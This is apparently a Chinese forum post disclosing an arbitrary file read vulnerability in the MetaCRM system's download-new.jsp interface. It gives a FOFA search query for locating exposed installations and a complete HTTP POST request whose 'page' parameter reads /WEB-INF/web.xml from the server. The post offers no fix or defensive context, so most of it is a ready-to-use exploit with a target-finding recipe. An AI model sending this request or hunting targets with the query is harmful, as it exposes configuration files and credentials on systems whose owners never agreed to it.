MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
1:漏洞描述MetaCRM美特crm系统download-new.jsp接口存在任意文件读取漏洞
2:影响版本
MetaCRM美特crm
3:fofa查询语句
body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
4:漏洞复现
漏洞链接:https://xx.xx.xx.xx/business/common/download-new.jsp
漏洞数据包:POST /business/common/download-new.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
filename=1.png&page=/WEB-INF/web.xml
页:
[1]